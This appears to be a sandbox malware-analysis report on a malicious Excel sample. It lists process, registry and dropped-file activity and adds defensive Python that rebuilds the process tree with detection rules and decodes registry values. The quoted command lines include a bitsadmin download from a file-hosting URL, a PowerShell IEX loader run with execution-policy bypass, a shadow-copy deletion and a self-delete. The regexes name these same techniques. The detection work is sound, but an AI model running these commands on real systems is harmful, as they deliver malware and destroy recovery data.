c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\timeout.exe

PID
3472
CMD
timeout -c 5
Path
C:\Windows\system32\timeout.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
timeout - pauses command processing
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
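
The behavior activities and the process entries above describe one chain: Excel launches `bitsadmin.exe` to fetch `obfuscated.tmp` as `pepe.js`, `WScript.exe` runs it, the script starts PowerShell, which deletes shadow copies through `wmic.exe` and spawns `cmd.exe` for a delayed `del`. The Python below is an added example, not ANY.RUN's signature logic or anything from the sample: it rebuilds that process tree from records constructed out of the report's PIDs and command lines (parent PIDs are resolved from the "Parent process" names, which each map to a single PID in this task) and runs command-line rules for each stage plus an ancestry check for anything rooted in an Office process. The rule names are this example's own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Proc:
    pid: int
    ppid: Optional[int]
    cmd: str


# Constructed from the process entries in this report (PIDs and command lines copied from
# the report; parent PIDs resolved from the "Parent process" names).
PROCS = [
    Proc(2972, None, r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde'),
    Proc(3344, 2972, r'"C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal '
                     r'https://download1591.mediafire.com/50dbuyji2mvg/lqn7rd8dez3cvmc/obfuscated.tmp '
                     r'C:\Users\admin\AppData\Local\Temp\\pepe.js'),
    Proc(3328, 2972, r'"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\pepe.js"'),
    Proc(3596, 3328, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass '''
                     r'''-Command "IEX (([System.IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\tnqalxuybs.log')).Replace('?',''));"'''),
    Proc(2884, 3596, r'"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete'),
    Proc(3960, 3596, r'"C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /f /q'),
    Proc(3472, 3960, r'timeout -c 5'),
]

OFFICE = re.compile(r"\\(excel|winword|powerpnt|outlook|msaccess)\.exe", re.I)
LOLBIN = re.compile(r"\\(bitsadmin|wscript|cscript|powershell|cmd|mshta|certutil|regsvr32|rundll32|wmic)\.exe", re.I)

# One command-line signature per stage observed in this task.
RULES = [
    ("bits_download_cradle", re.compile(r"bitsadmin\.exe.*/transfer.*https?://", re.I)),
    ("script_host_from_temp", re.compile(r'\\[wc]script\.exe.*\\temp\\[^"]+\.(?:js|jse|vbs|vbe|wsf)', re.I)),
    ("powershell_iex_file_loader", re.compile(r"powershell\.exe.*-executionpolicy\s+bypass.*\bIEX\b.*ReadAllText", re.I)),
    ("shadow_copy_deletion", re.compile(r"wmic\.exe.*shadowcopy\s+delete|vssadmin\.exe.*delete\s+shadows", re.I)),
    ("delayed_delete_via_cmd", re.compile(r"cmd\.exe.*/c\s+timeout\b.*&\s*del\b", re.I)),
]


def chain(pid: int, by_pid: Dict[int, Proc]) -> List[int]:
    """PIDs from the root of the tree down to pid; stops at an unknown parent or a cycle."""
    out, seen = [], set()
    p = by_pid.get(pid)
    while p is not None and p.pid not in seen:
        seen.add(p.pid)
        out.append(p.pid)
        p = by_pid.get(p.ppid) if p.ppid is not None else None
    return out[::-1]


def detect(procs: List[Proc]) -> Dict[int, List[str]]:
    """Map each PID to the sorted list of rule names that fire on it (PIDs without hits are omitted)."""
    by_pid = {p.pid: p for p in procs}
    hits: Dict[int, List[str]] = {}
    for p in procs:
        names = [name for name, rx in RULES if rx.search(p.cmd)]
        parent = by_pid.get(p.ppid) if p.ppid is not None else None
        if parent and OFFICE.search(parent.cmd) and LOLBIN.search(p.cmd):
            names.append("office_spawns_lolbin")        # direct child of an Office process
        lineage = chain(p.pid, by_pid)
        if len(lineage) > 2 and OFFICE.search(by_pid[lineage[0]].cmd):
            names.append("office_rooted_chain")         # grandchild or deeper, root is Office
        if names:
            hits[p.pid] = sorted(names)
    return hits


if __name__ == "__main__":
    by_pid = {p.pid: p for p in PROCS}
    for pid, names in detect(PROCS).items():
        print(pid, " > ".join(str(x) for x in chain(pid, by_pid)), names)
```

Two points the rules rely on. The dropped `tnqalxuybs.log` is not valid PowerShell until `.Replace('?','')` strips the padding, so scanning that file on disk can miss the loader; the command line (and script block logging on newer hosts) is where it is visible. Also, `timeout.exe` takes `/T`, not `-c`, so its exit code of 1 above is consistent with the 5-second delay never running before `del`; and a medium-integrity `del` on a System32 binary is denied, so the self-delete stage is noise rather than impact.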

Registry activity

Total events
1111
Read events
989
Write events
114
Delete events
8

Modification events

PID
Process
Operation
Key
Name
Value
2972
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
2972
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
2972
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EE2E
2972
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
2972
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EF28
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
g),
67292C009C0B0000010000000000000000000000
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
9C0B0000148038361EA9D40100000000
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EE2E
20EE2E
040000009C0B00002F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0053004F004300200074006500730074002E0078006C0073006D00000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000F03E29371EA9D4012EEE20002EEE200000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EE2E
20EE2E
040000009C0B00002F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0053004F004300200074006500730074002E0078006C0073006D00000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000F03E29371EA9D4012EEE20002EEE200000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2972
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1311375383
2972
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1311375504
2972
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1311375364
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{2C08D2BE-9BA2-4C66-A82D-B6739C40C8C4}
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EE2E
20EE2E
040000009C0B00002F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0053004F004300200074006500730074002E0078006C0073006D00000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000F03E29371EA9D4012EEE20002EEE200000000000AC020000001800000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EF28
20EF28
040000009C0B00002F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0053004F004300200074006500730074002E0078006C0073006D00000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000001000000F8312A361EA9D40128EF200028EF200000000000AC020000660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2972
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1311375505
2972
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1311375506
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTF
100
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTA
100
3328
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3328
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3596
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\ex_data\data
ext
2E00630074006200780065007A006500680063000000
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
public
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
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
private
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
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
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
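Two of the values in the registry table above decode into something a responder can use. The `ext` value that powershell.exe (PID 3596) wrote under HKCU\Software\ex_data\data is a NUL-terminated UTF-16LE string. The two Excel Resiliency\DocumentRecovery records written by EXCEL.EXE (PID 2972) carry a dword-length-prefixed UTF-16LE path of the document Excel had open (the sample, launched from %TEMP%) followed by its directory; their second dword is 0x0B9C = 2972, the same PID the report shows as the writer; the bytes after the FILETIME repeat the record's own subkey name as a little-endian dword (2EEE2000 in 20EE2E, 28EF2000 in 20EF28). The script below is an added example, not ANY.RUN code. Its reading of the layout (u32 count, then that many UTF-16LE characters; a FILETIME located by scanning for a value inside a date window) is inferred from this page's bytes only, not from a published format description, and the sample hex is copied from the records above with the trailing zero padding of the DocumentRecovery value left out.

```python
from datetime import datetime, timedelta, timezone

# Copied from the report: HKCU\Software\ex_data\data -> ext (PID 3596, powershell.exe).
EXT_VALUE_HEX = "2E00630074006200780065007A006500680063000000"

# Leading bytes of HKCU\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EE2E
# (PID 2972, EXCEL.EXE), copied from the report.  The value continues with zero padding,
# which is omitted here.  The pieces are split only for readability.
DOCRECOVERY_20EE2E_HEX = (
    "04000000" "9C0B0000" "2F000000"                                   # dwords: 4, 2972, 47
    "43003A005C00" "550073006500720073005C00" "610064006D0069006E005C00"
    "41007000700044006100740061005C00" "4C006F00630061006C005C00" "540065006D0070005C00"
    "53004F004300" "2000" "7400650073007400" "2E00" "78006C0073006D00"  # ...SOC test.xlsm
    "00000000" "22000000"                                              # pad, dword 34
    "43003A005C00" "550073006500720073005C00" "610064006D0069006E005C00"
    "41007000700044006100740061005C00" "4C006F00630061006C005C00" "540065006D0070005C00"
    "01000000" "00000000"
    "F03E29371EA9D401"                                                 # FILETIME
    "2EEE2000" "2EEE2000" "00000000" "AC020000" "00180000" "04000000"  # 0x20EE2E = subkey name
)

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def decode_utf16_value(hex_data: str) -> str:
    """REG_BINARY holding a NUL-terminated UTF-16LE string, shown as hex by the sandbox."""
    return bytes.fromhex(hex_data).decode("utf-16-le").rstrip("\x00")


def u32_words(blob: bytes, count: int) -> list:
    """First `count` little-endian dwords of a value (here: [4, PID, path length])."""
    return [int.from_bytes(blob[i:i + 4], "little") for i in range(0, 4 * count, 4)]


def length_prefixed_strings(blob: bytes, min_chars: int = 3, max_chars: int = 1024) -> list:
    """(offset, text) for every dword-length-prefixed run of printable UTF-16LE characters.

    Steps 2 bytes at a time; a candidate is accepted only when the length field is plausible
    and every decoded character is printable ASCII, so binary dwords never match."""
    found, off = [], 0
    while off + 4 <= len(blob):
        n = int.from_bytes(blob[off:off + 4], "little")
        end = off + 4 + 2 * n
        if min_chars <= n <= max_chars and end <= len(blob):
            text = blob[off + 4:end].decode("utf-16-le", errors="replace")
            if all(0x20 <= ord(c) < 0x7F for c in text):
                found.append((off, text))
                off = end
                continue
        off += 2
    return found


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def find_filetimes(blob: bytes, year_lo: int = 2000, year_hi: int = 2030) -> list:
    """(offset, datetime) for every 8-byte LE value that is a FILETIME inside [year_lo, year_hi).

    The date window is what keeps UTF-16 path bytes and small counters from matching."""
    lo = (datetime(year_lo, 1, 1, tzinfo=timezone.utc) - EPOCH_1601) // timedelta(microseconds=1) * 10
    hi = (datetime(year_hi, 1, 1, tzinfo=timezone.utc) - EPOCH_1601) // timedelta(microseconds=1) * 10
    hits = []
    for off in range(0, len(blob) - 7, 2):
        ft = int.from_bytes(blob[off:off + 8], "little")
        if lo <= ft < hi:
            hits.append((off, filetime_to_datetime(ft)))
    return hits


def references_subkey(blob: bytes, subkey: str) -> bool:
    """True if the record embeds its own subkey name (hex, e.g. '20EE2E') as a LE dword."""
    return int(subkey, 16).to_bytes(4, "little") in blob


if __name__ == "__main__":
    print("ext =", decode_utf16_value(EXT_VALUE_HEX))
    blob = bytes.fromhex(DOCRECOVERY_20EE2E_HEX)
    print("header dwords:", u32_words(blob, 3))
    for off, text in length_prefixed_strings(blob):
        print(f"  +{off:#06x}  {text}")
    for off, when in find_filetimes(blob):
        print(f"  +{off:#06x}  FILETIME {when:%Y-%m-%d %H:%M:%S} UTC")
    print("record names its own subkey:", references_subkey(blob, "20EE2E"))
```

The FILETIME in the 20EE2E record resolves to 2019-01-10 19:53:54 UTC, a few seconds after the analysis start shown in the report header if that header is in UTC+1; whether the stamp marks the open or the first autosave is not something this page settles, so treat it as "Excel had the sample open at that moment" and nothing more. The same functions run unchanged over the 20EF28 record.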

Files activity

Executable files: 0
Suspicious files: 289
Text files: 237
Unknown types: 7

Dropped files

PID
Process
Filename
Type
MD5
SHA256
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: ce40e23e4021619f2fda2133d99da66e
SHA256: 245707b274d0d69490bfaf5081c4acfc5a83984b051946014fa00b415ac6ad4d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: bc09a4f5ed304ab973a6dd151678aa2a
SHA256: 1cb74a0767e75b02c6718b220021cf1458a622db008719f2dfd96b0163e670ba
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 17593987d92e54a6aa19c3f68c269ab8
SHA256: 5ecaac6bf731cd4eee351c3bd4f1d429e4801ab23aeb9153cf0145cee13c7bdf
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 0a4cd24768fd1d38f6fd2b73397d0a20
SHA256: 1b008428d73d11c211a58163c4a061659b5b83dab5a800302f410145ae8194ba
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 8b9af33189bf47995844088ed8388a62
SHA256: 527ca967a00107e9b56d260056b7d1c16a634b68a0888ba0db8cb8e64852c198
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: b2eee648ea4c0e15bd7c8f91e9accc20
SHA256: 85653cf2290a9c6db42300f564db50543a70b31aa4d374a002191cd35edce4ca
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: edc2e924014f7cf6a783b66258b7a53d
SHA256: b4e7c476087984b1f985b3296ebce99b5b8e3c71c61f1cbcbd26d583b416c62b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 5511b4904e788dfa6889e6ae2b64a07f
SHA256: e57c7ff0c81c94fd93323a5e1b82fcf13b6ac976f1bd0abb6bff07cd672c548b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 91d95443884efa4d45481305fb9f48b4
SHA256: 3e40d199afda655cdccab598e3e63901cf229bfe615a4716524fc81380286a07
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 2cb5e2c2dd3e90c13f53b2b39c15a02b
SHA256: fc6fe55d3eb55a0d26a041627955e09d7d0fc2fb94971da219cc146f506ec380
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 1ff395df70318b735535efedf4c62992
SHA256: 11407d67cec1cbb0399398ae6966e523622d6bf7a67de40512ab8add763cacaf
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 2943777d75e844b5779dc79eb3d522c1
SHA256: d37303dc56c4defdd9f9c632d41c5cb4f34cdb0f55a90484eb8b56e3d252fb6f
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: fb6eb60f75fee415196ecfa9513785a3
SHA256: a48e6bb5ccf9ce170e719e931c9aee0aa9c112508534dba047149a60e4b4a603
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 0860765b21d518c573c958a761fabb8a
SHA256: 7d232d00425144468506fbd9a43911ca8c1bc5e6b8960c60cf74810739f2f4cb
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: db6940943b0f758009b82b83282f022a
SHA256: 9369dd6f949855be49849c42e4ced293fb2f0dd3d409edaf7f30b172560986e0
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 9f2b69ac0d615142ae3fcebd5dcbca4a
SHA256: d1510915df5b7eac9f728c10727c4dbd4bc9825f80501d37cba66173063bce9e
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: becb8210f95491e0d59cc26205625592
SHA256: 1eb196f56ed620c0d176bd922301433fec347e9f9e9f0a01d596ba58f9a6c981
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: cd3c1e9796d4154ec39a3a82a278f4ac
SHA256: 787c61114319744736bb39b7ee1d19dd9ce18b6eff9921d3f3136a0d7abe0182
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 85bd3fa695f0173d861806b172f6ceeb
SHA256: b0a0527170900eb8ee440e7e6909199c1578dd2440ae4e0156f6e0f94b114294
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: bcfea57dabe93266c45fe88ed347614a
SHA256: 946a8cf89175746abd481cf5aff720650a0fa2f32e913828d5cc690834906623
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 5a7488b0ef276dbf7f7dbf1a69686ea7
SHA256: 1680547e9c9a8ad453f4b2c46e7822adeee5dbc906d7593b76b327a278dcce28
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 34508b67d1d61ebb83b2c715addf395e
SHA256: 8cc85bdcaf273dd36ded40690bf382871c2c0dd1a53460085c4ede83ada9f7ff
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 5ed2907838e5d050abc700d198575307
SHA256: d5a15db22640c86e92a35029163455b6c6fce8fe12283720c0d108c83677e93f
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 0d21ce6c9ca975dc077aa5feca26ed02
